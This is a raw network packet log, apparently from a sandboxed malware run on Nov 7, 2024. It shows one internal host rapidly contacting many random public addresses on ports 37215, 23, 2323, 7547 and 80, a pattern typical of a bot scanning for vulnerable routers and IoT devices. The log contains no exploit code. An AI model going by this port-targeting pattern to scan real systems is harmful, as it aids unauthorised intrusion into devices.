                                          Nov 7, 2024 11:57:59.447559118 CET3070437215192.168.2.13156.108.16.14
                                          Nov 7, 2024 11:57:59.447567940 CET3721530704156.194.114.46192.168.2.13
                                          Nov 7, 2024 11:57:59.447575092 CET3070437215192.168.2.13156.82.148.42
                                          Nov 7, 2024 11:57:59.447577000 CET3070437215192.168.2.13156.73.123.98
                                          Nov 7, 2024 11:57:59.447577000 CET3721530704156.163.153.193192.168.2.13
                                          Nov 7, 2024 11:57:59.447577000 CET228880192.168.2.1382.9.156.51
                                          Nov 7, 2024 11:57:59.447587967 CET3070437215192.168.2.13156.221.167.55
                                          Nov 7, 2024 11:57:59.447588921 CET3721530704156.166.181.59192.168.2.13
                                          Nov 7, 2024 11:57:59.447611094 CET228880192.168.2.1382.147.70.223
                                          Nov 7, 2024 11:57:59.447613001 CET3070437215192.168.2.13156.194.114.46
                                          Nov 7, 2024 11:57:59.447619915 CET3070437215192.168.2.13156.163.153.193
                                          Nov 7, 2024 11:57:59.447619915 CET3070437215192.168.2.13156.166.181.59
                                          Nov 7, 2024 11:57:59.447619915 CET228880192.168.2.1382.254.104.25
                                          Nov 7, 2024 11:57:59.447619915 CET228880192.168.2.1382.92.18.12
                                          Nov 7, 2024 11:57:59.447633982 CET228880192.168.2.1382.171.26.193
                                          Nov 7, 2024 11:57:59.447639942 CET228880192.168.2.1382.222.165.185
                                          Nov 7, 2024 11:57:59.447649956 CET228880192.168.2.1382.94.164.37
                                          Nov 7, 2024 11:57:59.447650909 CET228880192.168.2.1382.221.38.235
                                          Nov 7, 2024 11:57:59.447659016 CET228880192.168.2.1382.127.35.146
                                          Nov 7, 2024 11:57:59.447665930 CET228880192.168.2.1382.107.206.54
                                          Nov 7, 2024 11:57:59.447673082 CET228880192.168.2.1382.87.201.86
                                          Nov 7, 2024 11:57:59.447676897 CET228880192.168.2.1382.48.230.225
                                          Nov 7, 2024 11:57:59.447676897 CET228880192.168.2.1382.89.212.229
                                          Nov 7, 2024 11:57:59.447695971 CET228880192.168.2.1382.107.82.17
                                          Nov 7, 2024 11:57:59.447704077 CET228880192.168.2.1382.97.70.81
                                          Nov 7, 2024 11:57:59.447705030 CET228880192.168.2.1382.30.101.30
                                          Nov 7, 2024 11:57:59.447705030 CET228880192.168.2.1382.111.220.197
                                          Nov 7, 2024 11:57:59.447712898 CET228880192.168.2.1382.172.85.218
                                          Nov 7, 2024 11:57:59.447714090 CET228880192.168.2.1382.177.24.131
                                          Nov 7, 2024 11:57:59.447715044 CET228880192.168.2.1382.192.1.86
                                          Nov 7, 2024 11:57:59.447714090 CET228880192.168.2.1382.186.5.60
                                          Nov 7, 2024 11:57:59.447726965 CET228880192.168.2.1382.59.40.236
                                          Nov 7, 2024 11:57:59.447732925 CET228880192.168.2.1382.224.12.14
                                          Nov 7, 2024 11:57:59.447732925 CET228880192.168.2.1382.125.170.255
                                          Nov 7, 2024 11:57:59.447732925 CET228880192.168.2.1382.14.127.39
                                          Nov 7, 2024 11:57:59.447732925 CET228880192.168.2.1382.98.31.142
                                          Nov 7, 2024 11:57:59.447748899 CET228880192.168.2.1382.195.62.163
                                          Nov 7, 2024 11:57:59.447748899 CET228880192.168.2.1382.15.107.198
                                          Nov 7, 2024 11:57:59.447753906 CET228880192.168.2.1382.88.212.189
                                          Nov 7, 2024 11:57:59.447756052 CET228880192.168.2.1382.155.210.226
                                          Nov 7, 2024 11:57:59.447761059 CET228880192.168.2.1382.108.51.77
                                          Nov 7, 2024 11:57:59.447765112 CET228880192.168.2.1382.141.27.90
                                          Nov 7, 2024 11:57:59.447774887 CET228880192.168.2.1382.102.191.37
                                          Nov 7, 2024 11:57:59.447777033 CET228880192.168.2.1382.113.242.230
                                          Nov 7, 2024 11:57:59.447782040 CET228880192.168.2.1382.136.42.115
                                          Nov 7, 2024 11:57:59.447788954 CET228880192.168.2.1382.29.126.64
                                          Nov 7, 2024 11:57:59.447801113 CET228880192.168.2.1382.81.213.95
                                          Nov 7, 2024 11:57:59.447804928 CET3721530704156.73.119.3192.168.2.13
                                          Nov 7, 2024 11:57:59.447814941 CET228880192.168.2.1382.197.99.60
                                          Nov 7, 2024 11:57:59.447814941 CET228880192.168.2.1382.26.166.143
                                          Nov 7, 2024 11:57:59.447822094 CET228880192.168.2.1382.214.194.195
                                          Nov 7, 2024 11:57:59.447829008 CET228880192.168.2.1382.55.51.55
                                          Nov 7, 2024 11:57:59.447829008 CET228880192.168.2.1382.226.199.112
                                          Nov 7, 2024 11:57:59.447829962 CET228880192.168.2.1382.154.173.193
                                          Nov 7, 2024 11:57:59.447829008 CET228880192.168.2.1382.127.191.12
                                          Nov 7, 2024 11:57:59.447834015 CET228880192.168.2.1382.190.184.94
                                          Nov 7, 2024 11:57:59.447834015 CET228880192.168.2.1382.236.225.72
                                          Nov 7, 2024 11:57:59.447835922 CET228880192.168.2.1382.192.194.216
                                          Nov 7, 2024 11:57:59.447835922 CET228880192.168.2.1382.21.139.115
                                          Nov 7, 2024 11:57:59.447840929 CET3721530704156.16.120.39192.168.2.13
                                          Nov 7, 2024 11:57:59.447844982 CET228880192.168.2.1382.29.39.23
                                          Nov 7, 2024 11:57:59.447849989 CET228880192.168.2.1382.47.238.169
                                          Nov 7, 2024 11:57:59.447851896 CET3721530704156.251.28.242192.168.2.13
                                          Nov 7, 2024 11:57:59.447863102 CET228880192.168.2.1382.55.128.189
                                          Nov 7, 2024 11:57:59.447863102 CET228880192.168.2.1382.212.155.231
                                          Nov 7, 2024 11:57:59.447870970 CET3070437215192.168.2.13156.73.119.3
                                          Nov 7, 2024 11:57:59.447870970 CET228880192.168.2.1382.99.80.193
                                          Nov 7, 2024 11:57:59.447882891 CET228880192.168.2.1382.179.168.116
                                          Nov 7, 2024 11:57:59.447885990 CET3070437215192.168.2.13156.16.120.39
                                          Nov 7, 2024 11:57:59.447885990 CET3070437215192.168.2.13156.251.28.242
                                          Nov 7, 2024 11:57:59.447886944 CET228880192.168.2.1382.130.18.207
                                          Nov 7, 2024 11:57:59.447885990 CET228880192.168.2.1382.146.130.209
                                          Nov 7, 2024 11:57:59.447897911 CET228880192.168.2.1382.143.6.244
                                          Nov 7, 2024 11:57:59.447904110 CET228880192.168.2.1382.0.70.104
                                          Nov 7, 2024 11:57:59.447904110 CET228880192.168.2.1382.124.230.212
                                          Nov 7, 2024 11:57:59.447913885 CET228880192.168.2.1382.100.75.188
                                          Nov 7, 2024 11:57:59.447921991 CET228880192.168.2.1382.147.12.221
                                          Nov 7, 2024 11:57:59.447921991 CET228880192.168.2.1382.138.181.209
                                          Nov 7, 2024 11:57:59.447932959 CET228880192.168.2.1382.97.180.127
                                          Nov 7, 2024 11:57:59.447937965 CET228880192.168.2.1382.158.114.200
                                          Nov 7, 2024 11:57:59.447942019 CET228880192.168.2.1382.74.244.4
                                          Nov 7, 2024 11:57:59.447952986 CET228880192.168.2.1382.224.210.68
                                          Nov 7, 2024 11:57:59.447956085 CET228880192.168.2.1382.207.219.179
                                          Nov 7, 2024 11:57:59.447963953 CET228880192.168.2.1382.218.107.238
                                          Nov 7, 2024 11:57:59.447963953 CET228880192.168.2.1382.185.253.84
                                          Nov 7, 2024 11:57:59.447967052 CET228880192.168.2.1382.49.8.88
                                          Nov 7, 2024 11:57:59.447968960 CET228880192.168.2.1382.166.58.191
                                          Nov 7, 2024 11:57:59.447984934 CET228880192.168.2.1382.57.176.125
                                          Nov 7, 2024 11:57:59.447984934 CET228880192.168.2.1382.34.146.158
                                          Nov 7, 2024 11:57:59.447993994 CET3721530704156.184.162.88192.168.2.13
                                          Nov 7, 2024 11:57:59.448000908 CET228880192.168.2.1382.44.254.156
                                          Nov 7, 2024 11:57:59.448008060 CET3721530704156.57.136.92192.168.2.13
                                          Nov 7, 2024 11:57:59.448012114 CET228880192.168.2.1382.167.179.203
                                          Nov 7, 2024 11:57:59.448013067 CET228880192.168.2.1382.112.53.102
                                          Nov 7, 2024 11:57:59.448012114 CET228880192.168.2.1382.245.86.95
                                          Nov 7, 2024 11:57:59.448013067 CET228880192.168.2.1382.76.98.96
                                          Nov 7, 2024 11:57:59.448013067 CET228880192.168.2.1382.224.60.44
                                          Nov 7, 2024 11:57:59.448013067 CET228880192.168.2.1382.224.71.25
                                          Nov 7, 2024 11:57:59.448018074 CET3721530704156.61.131.95192.168.2.13
                                          Nov 7, 2024 11:57:59.448019981 CET228880192.168.2.1382.124.85.80
                                          Nov 7, 2024 11:57:59.448028088 CET3721530704156.33.208.36192.168.2.13
                                          Nov 7, 2024 11:57:59.448033094 CET228880192.168.2.1382.172.176.150
                                          Nov 7, 2024 11:57:59.448033094 CET3070437215192.168.2.13156.184.162.88
                                          Nov 7, 2024 11:57:59.448033094 CET3070437215192.168.2.13156.57.136.92
                                          Nov 7, 2024 11:57:59.448038101 CET3721530704156.105.206.27192.168.2.13
                                          Nov 7, 2024 11:57:59.448048115 CET228880192.168.2.1382.244.153.84
                                          Nov 7, 2024 11:57:59.448049068 CET228880192.168.2.1382.39.52.112
                                          Nov 7, 2024 11:57:59.448056936 CET3721530704156.64.112.174192.168.2.13
                                          Nov 7, 2024 11:57:59.448064089 CET228880192.168.2.1382.18.90.132
                                          Nov 7, 2024 11:57:59.448064089 CET228880192.168.2.1382.224.85.35
                                          Nov 7, 2024 11:57:59.448066950 CET3721530704156.251.160.103192.168.2.13
                                          Nov 7, 2024 11:57:59.448067904 CET228880192.168.2.1382.227.25.61
                                          Nov 7, 2024 11:57:59.448069096 CET3070437215192.168.2.13156.105.206.27
                                          Nov 7, 2024 11:57:59.448067904 CET3070437215192.168.2.13156.61.131.95
                                          Nov 7, 2024 11:57:59.448069096 CET228880192.168.2.1382.95.58.13
                                          Nov 7, 2024 11:57:59.448070049 CET3070437215192.168.2.13156.33.208.36
                                          Nov 7, 2024 11:57:59.448070049 CET228880192.168.2.1382.146.60.44
                                          Nov 7, 2024 11:57:59.448071957 CET228880192.168.2.1382.235.194.66
                                          Nov 7, 2024 11:57:59.448071957 CET228880192.168.2.1382.82.73.251
                                          Nov 7, 2024 11:57:59.448076963 CET3721530704156.205.35.215192.168.2.13
                                          Nov 7, 2024 11:57:59.448088884 CET3721530704156.167.76.89192.168.2.13
                                          Nov 7, 2024 11:57:59.448095083 CET3070437215192.168.2.13156.64.112.174
                                          Nov 7, 2024 11:57:59.448097944 CET3721530704156.239.95.216192.168.2.13
                                          Nov 7, 2024 11:57:59.448110104 CET3721530704156.91.87.137192.168.2.13
                                          Nov 7, 2024 11:57:59.448110104 CET3070437215192.168.2.13156.251.160.103
                                          Nov 7, 2024 11:57:59.448110104 CET3070437215192.168.2.13156.205.35.215
                                          Nov 7, 2024 11:57:59.448120117 CET3721530704156.81.176.87192.168.2.13
                                          Nov 7, 2024 11:57:59.448121071 CET3070437215192.168.2.13156.167.76.89
                                          Nov 7, 2024 11:57:59.448129892 CET3721530704156.10.219.97192.168.2.13
                                          Nov 7, 2024 11:57:59.448138952 CET3721530704156.0.141.109192.168.2.13
                                          Nov 7, 2024 11:57:59.448142052 CET3070437215192.168.2.13156.91.87.137
                                          Nov 7, 2024 11:57:59.448149920 CET3721530704156.29.148.130192.168.2.13
                                          Nov 7, 2024 11:57:59.448151112 CET3070437215192.168.2.13156.239.95.216
                                          Nov 7, 2024 11:57:59.448160887 CET3070437215192.168.2.13156.81.176.87
                                          Nov 7, 2024 11:57:59.448160887 CET3070437215192.168.2.13156.10.219.97
                                          Nov 7, 2024 11:57:59.448163033 CET3721530704156.134.181.57192.168.2.13
                                          Nov 7, 2024 11:57:59.448174000 CET3721530704156.236.153.8192.168.2.13
                                          Nov 7, 2024 11:57:59.448180914 CET3070437215192.168.2.13156.29.148.130
                                          Nov 7, 2024 11:57:59.448183060 CET3721530704156.162.4.115192.168.2.13
                                          Nov 7, 2024 11:57:59.448189020 CET3070437215192.168.2.13156.134.181.57
                                          Nov 7, 2024 11:57:59.448190928 CET3070437215192.168.2.13156.0.141.109
                                          Nov 7, 2024 11:57:59.448195934 CET3721530704156.136.233.186192.168.2.13
                                          Nov 7, 2024 11:57:59.448205948 CET3721530704156.67.86.185192.168.2.13
                                          Nov 7, 2024 11:57:59.448215961 CET3070437215192.168.2.13156.162.4.115
                                          Nov 7, 2024 11:57:59.448219061 CET3070437215192.168.2.13156.236.153.8
                                          Nov 7, 2024 11:57:59.448225021 CET3070437215192.168.2.13156.136.233.186
                                          Nov 7, 2024 11:57:59.448239088 CET3070437215192.168.2.13156.67.86.185
                                          Nov 7, 2024 11:57:59.448518038 CET3721530704156.181.22.223192.168.2.13
                                          Nov 7, 2024 11:57:59.448528051 CET3721530704156.46.141.189192.168.2.13
                                          Nov 7, 2024 11:57:59.448539019 CET3721530704156.17.129.207192.168.2.13
                                          Nov 7, 2024 11:57:59.448563099 CET3070437215192.168.2.13156.181.22.223
                                          Nov 7, 2024 11:57:59.448571920 CET3070437215192.168.2.13156.46.141.189
                                          Nov 7, 2024 11:57:59.448576927 CET3070437215192.168.2.13156.17.129.207
                                          Nov 7, 2024 11:57:59.448674917 CET3721530704156.166.25.246192.168.2.13
                                          Nov 7, 2024 11:57:59.448685884 CET3721530704156.87.55.140192.168.2.13
                                          Nov 7, 2024 11:57:59.448694944 CET3721530704156.21.232.119192.168.2.13
                                          Nov 7, 2024 11:57:59.448705912 CET3721530704156.90.62.62192.168.2.13
                                          Nov 7, 2024 11:57:59.448714018 CET3070437215192.168.2.13156.166.25.246
                                          Nov 7, 2024 11:57:59.448714018 CET3070437215192.168.2.13156.87.55.140
                                          Nov 7, 2024 11:57:59.448715925 CET3721530704156.58.9.179192.168.2.13
                                          Nov 7, 2024 11:57:59.448726892 CET3721530704156.98.18.12192.168.2.13
                                          Nov 7, 2024 11:57:59.448728085 CET3070437215192.168.2.13156.21.232.119
                                          Nov 7, 2024 11:57:59.448738098 CET3721530704156.247.5.222192.168.2.13
                                          Nov 7, 2024 11:57:59.448741913 CET3070437215192.168.2.13156.90.62.62
                                          Nov 7, 2024 11:57:59.448748112 CET3070437215192.168.2.13156.58.9.179
                                          Nov 7, 2024 11:57:59.448759079 CET3070437215192.168.2.13156.98.18.12
                                          Nov 7, 2024 11:57:59.448761940 CET3721530704156.114.141.7192.168.2.13
                                          Nov 7, 2024 11:57:59.448769093 CET3070437215192.168.2.13156.247.5.222
                                          Nov 7, 2024 11:57:59.448772907 CET3721530704156.69.148.237192.168.2.13
                                          Nov 7, 2024 11:57:59.448782921 CET3721530704156.183.55.156192.168.2.13
                                          Nov 7, 2024 11:57:59.448792934 CET3721530704156.62.15.90192.168.2.13
                                          Nov 7, 2024 11:57:59.448796988 CET3070437215192.168.2.13156.69.148.237
                                          Nov 7, 2024 11:57:59.448800087 CET3070437215192.168.2.13156.114.141.7
                                          Nov 7, 2024 11:57:59.448802948 CET3721530704156.77.82.141192.168.2.13
                                          Nov 7, 2024 11:57:59.448812962 CET3721530704156.83.49.1192.168.2.13
                                          Nov 7, 2024 11:57:59.448817968 CET3070437215192.168.2.13156.183.55.156
                                          Nov 7, 2024 11:57:59.448817968 CET3070437215192.168.2.13156.62.15.90
                                          Nov 7, 2024 11:57:59.448822975 CET3721530704156.204.230.109192.168.2.13
                                          Nov 7, 2024 11:57:59.448832035 CET3721530704156.206.212.137192.168.2.13
                                          Nov 7, 2024 11:57:59.448839903 CET3070437215192.168.2.13156.77.82.141
                                          Nov 7, 2024 11:57:59.448839903 CET3070437215192.168.2.13156.83.49.1
                                          Nov 7, 2024 11:57:59.448842049 CET3721530704156.252.141.190192.168.2.13
                                          Nov 7, 2024 11:57:59.448852062 CET3721530704156.143.35.39192.168.2.13
                                          Nov 7, 2024 11:57:59.448856115 CET3070437215192.168.2.13156.204.230.109
                                          Nov 7, 2024 11:57:59.448865891 CET3721530704156.219.93.221192.168.2.13
                                          Nov 7, 2024 11:57:59.448873043 CET3070437215192.168.2.13156.206.212.137
                                          Nov 7, 2024 11:57:59.448877096 CET3721530704156.143.124.146192.168.2.13
                                          Nov 7, 2024 11:57:59.448879957 CET3070437215192.168.2.13156.252.141.190
                                          Nov 7, 2024 11:57:59.448879957 CET3070437215192.168.2.13156.143.35.39
                                          Nov 7, 2024 11:57:59.448887110 CET3721530704156.11.24.249192.168.2.13
                                          Nov 7, 2024 11:57:59.448894978 CET3070437215192.168.2.13156.219.93.221
                                          Nov 7, 2024 11:57:59.448899984 CET3721530704156.188.7.216192.168.2.13
                                          Nov 7, 2024 11:57:59.448911905 CET3070437215192.168.2.13156.143.124.146
                                          Nov 7, 2024 11:57:59.448930979 CET3070437215192.168.2.13156.188.7.216
                                          Nov 7, 2024 11:57:59.448971987 CET3070437215192.168.2.13156.11.24.249
                                          Nov 7, 2024 11:57:59.449107885 CET4251480192.168.2.13206.13.16.226
                                          Nov 7, 2024 11:57:59.449186087 CET3721530704156.183.196.1192.168.2.13
                                          Nov 7, 2024 11:57:59.449197054 CET3721530704156.62.46.133192.168.2.13
                                          Nov 7, 2024 11:57:59.449224949 CET3070437215192.168.2.13156.183.196.1
                                          Nov 7, 2024 11:57:59.449224949 CET3070437215192.168.2.13156.62.46.133
                                          Nov 7, 2024 11:57:59.449357033 CET3721530704156.147.68.116192.168.2.13
                                          Nov 7, 2024 11:57:59.449368000 CET3721530704156.168.59.88192.168.2.13
                                          Nov 7, 2024 11:57:59.449377060 CET3721530704156.168.12.152192.168.2.13
                                          Nov 7, 2024 11:57:59.449387074 CET3721530704156.206.95.236192.168.2.13
                                          Nov 7, 2024 11:57:59.449389935 CET3070437215192.168.2.13156.147.68.116
                                          Nov 7, 2024 11:57:59.449390888 CET3070437215192.168.2.13156.168.59.88
                                          Nov 7, 2024 11:57:59.449398041 CET3721530704156.136.34.165192.168.2.13
                                          Nov 7, 2024 11:57:59.449409008 CET3721530704156.210.116.15192.168.2.13
                                          Nov 7, 2024 11:57:59.449417114 CET3070437215192.168.2.13156.168.12.152
                                          Nov 7, 2024 11:57:59.449417114 CET3070437215192.168.2.13156.206.95.236
                                          Nov 7, 2024 11:57:59.449419022 CET3721530704156.238.141.220192.168.2.13
                                          Nov 7, 2024 11:57:59.449429035 CET3070437215192.168.2.13156.136.34.165
                                          Nov 7, 2024 11:57:59.449434042 CET3721530704156.172.36.215192.168.2.13
                                          Nov 7, 2024 11:57:59.449445009 CET3721530704156.98.21.250192.168.2.13
                                          Nov 7, 2024 11:57:59.449450016 CET3070437215192.168.2.13156.210.116.15
                                          Nov 7, 2024 11:57:59.449455023 CET3721530704156.158.115.255192.168.2.13
                                          Nov 7, 2024 11:57:59.449465990 CET3721530704156.15.69.25192.168.2.13
                                          Nov 7, 2024 11:57:59.449475050 CET3070437215192.168.2.13156.238.141.220
                                          Nov 7, 2024 11:57:59.449475050 CET3070437215192.168.2.13156.172.36.215
                                          Nov 7, 2024 11:57:59.449476957 CET3721530704156.1.104.250192.168.2.13
                                          Nov 7, 2024 11:57:59.449487925 CET3721530704156.121.117.180192.168.2.13
                                          Nov 7, 2024 11:57:59.449493885 CET3070437215192.168.2.13156.98.21.250
                                          Nov 7, 2024 11:57:59.449496031 CET3070437215192.168.2.13156.158.115.255
                                          Nov 7, 2024 11:57:59.449497938 CET3721530704156.144.138.164192.168.2.13
                                          Nov 7, 2024 11:57:59.449501038 CET3070437215192.168.2.13156.15.69.25
                                          Nov 7, 2024 11:57:59.449501038 CET3070437215192.168.2.13156.1.104.250
                                          Nov 7, 2024 11:57:59.449510098 CET3721530704156.182.3.224192.168.2.13
                                          Nov 7, 2024 11:57:59.449517965 CET3070437215192.168.2.13156.121.117.180
                                          Nov 7, 2024 11:57:59.449522018 CET3721530704156.170.235.215192.168.2.13
                                          Nov 7, 2024 11:57:59.449532986 CET3721530704156.178.24.208192.168.2.13
                                          Nov 7, 2024 11:57:59.449533939 CET3070437215192.168.2.13156.144.138.164
                                          Nov 7, 2024 11:57:59.449541092 CET3070437215192.168.2.13156.182.3.224
                                          Nov 7, 2024 11:57:59.449543953 CET3721530704156.204.28.122192.168.2.13
                                          Nov 7, 2024 11:57:59.449553013 CET3721530704156.99.219.135192.168.2.13
                                          Nov 7, 2024 11:57:59.449562073 CET3721530704156.38.118.66192.168.2.13
                                          Nov 7, 2024 11:57:59.449569941 CET3070437215192.168.2.13156.178.24.208
                                          Nov 7, 2024 11:57:59.449584961 CET3070437215192.168.2.13156.204.28.122
                                          Nov 7, 2024 11:57:59.449604988 CET3070437215192.168.2.13156.38.118.66
                                          Nov 7, 2024 11:57:59.449606895 CET3070437215192.168.2.13156.170.235.215
                                          Nov 7, 2024 11:57:59.449606895 CET3070437215192.168.2.13156.99.219.135
                                          Nov 7, 2024 11:57:59.449791908 CET3721530704156.53.120.123192.168.2.13
                                          Nov 7, 2024 11:57:59.449830055 CET3070437215192.168.2.13156.53.120.123
                                          Nov 7, 2024 11:57:59.449843884 CET3721530704156.167.67.11192.168.2.13
                                          Nov 7, 2024 11:57:59.449852943 CET5277223192.168.2.1378.185.19.227
                                          Nov 7, 2024 11:57:59.449855089 CET3721530704156.147.225.88192.168.2.13
                                          Nov 7, 2024 11:57:59.449865103 CET3721530704156.57.15.122192.168.2.13
                                          Nov 7, 2024 11:57:59.449886084 CET3070437215192.168.2.13156.147.225.88
                                          Nov 7, 2024 11:57:59.449888945 CET3721530704156.71.121.65192.168.2.13
                                          Nov 7, 2024 11:57:59.449889898 CET3070437215192.168.2.13156.167.67.11
                                          Nov 7, 2024 11:57:59.449899912 CET3721530704156.139.254.60192.168.2.13
                                          Nov 7, 2024 11:57:59.449908972 CET3070437215192.168.2.13156.57.15.122
                                          Nov 7, 2024 11:57:59.449909925 CET3721530704156.89.219.91192.168.2.13
                                          Nov 7, 2024 11:57:59.449919939 CET3721530704156.9.174.236192.168.2.13
                                          Nov 7, 2024 11:57:59.449925900 CET3070437215192.168.2.13156.71.121.65
                                          Nov 7, 2024 11:57:59.449928999 CET3070437215192.168.2.13156.139.254.60
                                          Nov 7, 2024 11:57:59.449938059 CET3721530704156.250.59.108192.168.2.13
                                          Nov 7, 2024 11:57:59.449939013 CET3070437215192.168.2.13156.89.219.91
                                          Nov 7, 2024 11:57:59.449948072 CET3721530704156.3.39.224192.168.2.13
                                          Nov 7, 2024 11:57:59.449954033 CET3070437215192.168.2.13156.9.174.236
                                          Nov 7, 2024 11:57:59.449959040 CET3721530704156.173.22.216192.168.2.13
                                          Nov 7, 2024 11:57:59.449961901 CET3070437215192.168.2.13156.250.59.108
                                          Nov 7, 2024 11:57:59.449971914 CET3721530704156.116.135.12192.168.2.13
                                          Nov 7, 2024 11:57:59.449976921 CET3070437215192.168.2.13156.3.39.224
                                          Nov 7, 2024 11:57:59.449982882 CET3721530704156.230.4.151192.168.2.13
                                          Nov 7, 2024 11:57:59.449992895 CET3721530704156.104.133.84192.168.2.13
                                          Nov 7, 2024 11:57:59.450007915 CET3070437215192.168.2.13156.173.22.216
                                          Nov 7, 2024 11:57:59.450011969 CET3721530704156.143.219.184192.168.2.13
                                          Nov 7, 2024 11:57:59.450017929 CET3070437215192.168.2.13156.104.133.84
                                          Nov 7, 2024 11:57:59.450022936 CET3721530704156.123.128.34192.168.2.13
                                          Nov 7, 2024 11:57:59.450025082 CET3070437215192.168.2.13156.230.4.151
                                          Nov 7, 2024 11:57:59.450033903 CET754737966178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.450037956 CET3070437215192.168.2.13156.116.135.12
                                          Nov 7, 2024 11:57:59.450056076 CET3070437215192.168.2.13156.143.219.184
                                          Nov 7, 2024 11:57:59.450063944 CET379667547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.450071096 CET3070437215192.168.2.13156.123.128.34
                                          Nov 7, 2024 11:57:59.451242924 CET4351823192.168.2.13161.29.101.223
                                          Nov 7, 2024 11:57:59.453811884 CET2337118118.31.154.82192.168.2.13
                                          Nov 7, 2024 11:57:59.453852892 CET3711823192.168.2.13118.31.154.82
                                          Nov 7, 2024 11:57:59.455281973 CET5895223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:57:59.457153082 CET80304482.46.81.177192.168.2.13
                                          Nov 7, 2024 11:57:59.457190037 CET3044880192.168.2.132.46.81.177
                                          Nov 7, 2024 11:57:59.460608006 CET467942323192.168.2.13156.49.176.215
                                          Nov 7, 2024 11:57:59.462291002 CET5793223192.168.2.13196.205.138.120
                                          Nov 7, 2024 11:57:59.462295055 CET80228882.165.163.69192.168.2.13
                                          Nov 7, 2024 11:57:59.462340117 CET228880192.168.2.1382.165.163.69
                                          Nov 7, 2024 11:57:59.462599039 CET513227547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:57:59.464380026 CET2358952128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:57:59.464421988 CET5895223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:57:59.487334013 CET5114623192.168.2.1386.224.145.190
                                          Nov 7, 2024 11:57:59.492168903 CET235114686.224.145.190192.168.2.13
                                          Nov 7, 2024 11:57:59.492388964 CET5114623192.168.2.1386.224.145.190
                                          Nov 7, 2024 11:57:59.599400043 CET5918623192.168.2.13174.209.10.2
                                          Nov 7, 2024 11:57:59.603573084 CET515267547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:59.604284048 CET2359186174.209.10.2192.168.2.13
                                          Nov 7, 2024 11:57:59.604337931 CET5918623192.168.2.13174.209.10.2
                                          Nov 7, 2024 11:57:59.604676962 CET4684423192.168.2.13207.60.175.68
                                          Nov 7, 2024 11:57:59.606316090 CET5754823192.168.2.1381.141.250.69
                                          Nov 7, 2024 11:57:59.606623888 CET520307547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:59.607777119 CET4994023192.168.2.13131.77.247.50
                                          Nov 7, 2024 11:57:59.609265089 CET75475152695.178.151.109192.168.2.13
                                          Nov 7, 2024 11:57:59.609286070 CET5007223192.168.2.13109.201.255.175
                                          Nov 7, 2024 11:57:59.609323025 CET515267547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:59.609446049 CET2346844207.60.175.68192.168.2.13
                                          Nov 7, 2024 11:57:59.609481096 CET4684423192.168.2.13207.60.175.68
                                          Nov 7, 2024 11:57:59.609565973 CET451547547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:59.610635042 CET4991623192.168.2.13137.57.45.175
                                          Nov 7, 2024 11:57:59.611466885 CET235754881.141.250.69192.168.2.13
                                          Nov 7, 2024 11:57:59.611479044 CET7547520304.230.209.133192.168.2.13
                                          Nov 7, 2024 11:57:59.611506939 CET520307547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:59.611546993 CET5754823192.168.2.1381.141.250.69
                                          Nov 7, 2024 11:57:59.612294912 CET4416423192.168.2.13220.108.149.100
                                          Nov 7, 2024 11:57:59.612550974 CET2349940131.77.247.50192.168.2.13
                                          Nov 7, 2024 11:57:59.612566948 CET362267547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:59.612616062 CET4994023192.168.2.13131.77.247.50
                                          Nov 7, 2024 11:57:59.613794088 CET581382323192.168.2.13193.51.5.71
                                          Nov 7, 2024 11:57:59.614114046 CET2350072109.201.255.175192.168.2.13
                                          Nov 7, 2024 11:57:59.614160061 CET5007223192.168.2.13109.201.255.175
                                          Nov 7, 2024 11:57:59.614281893 CET754745154201.250.120.24192.168.2.13
                                          Nov 7, 2024 11:57:59.614326000 CET451547547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:59.615438938 CET2349916137.57.45.175192.168.2.13
                                          Nov 7, 2024 11:57:59.615444899 CET3873023192.168.2.13171.193.98.94
                                          Nov 7, 2024 11:57:59.615488052 CET4991623192.168.2.13137.57.45.175
                                          Nov 7, 2024 11:57:59.615847111 CET597167547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:59.616848946 CET4074423192.168.2.13112.72.49.159
                                          Nov 7, 2024 11:57:59.617044926 CET2344164220.108.149.100192.168.2.13
                                          Nov 7, 2024 11:57:59.617095947 CET4416423192.168.2.13220.108.149.100
                                          Nov 7, 2024 11:57:59.617310047 CET754736226217.144.32.43192.168.2.13
                                          Nov 7, 2024 11:57:59.617393970 CET362267547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:59.618382931 CET5663623192.168.2.1380.180.18.98
                                          Nov 7, 2024 11:57:59.618566036 CET232358138193.51.5.71192.168.2.13
                                          Nov 7, 2024 11:57:59.618617058 CET581382323192.168.2.13193.51.5.71
                                          Nov 7, 2024 11:57:59.618783951 CET359647547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:57:59.619904041 CET6085423192.168.2.13180.96.78.149
                                          Nov 7, 2024 11:57:59.620248079 CET2338730171.193.98.94192.168.2.13
                                          Nov 7, 2024 11:57:59.620325089 CET3873023192.168.2.13171.193.98.94
                                          Nov 7, 2024 11:57:59.620587111 CET75475971634.183.63.81192.168.2.13
                                          Nov 7, 2024 11:57:59.620798111 CET597167547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:59.621663094 CET2340744112.72.49.159192.168.2.13
                                          Nov 7, 2024 11:57:59.621754885 CET4074423192.168.2.13112.72.49.159
                                          Nov 7, 2024 11:57:59.622107983 CET5563023192.168.2.1312.215.142.86
                                          Nov 7, 2024 11:57:59.622695923 CET370087547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:57:59.623796940 CET5871223192.168.2.13180.155.178.33
                                          Nov 7, 2024 11:57:59.625232935 CET3573623192.168.2.13162.236.208.131
                                          Nov 7, 2024 11:57:59.625624895 CET386867547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:57:59.626848936 CET5063423192.168.2.1380.226.118.23
                                          Nov 7, 2024 11:57:59.628509998 CET2358712180.155.178.33192.168.2.13
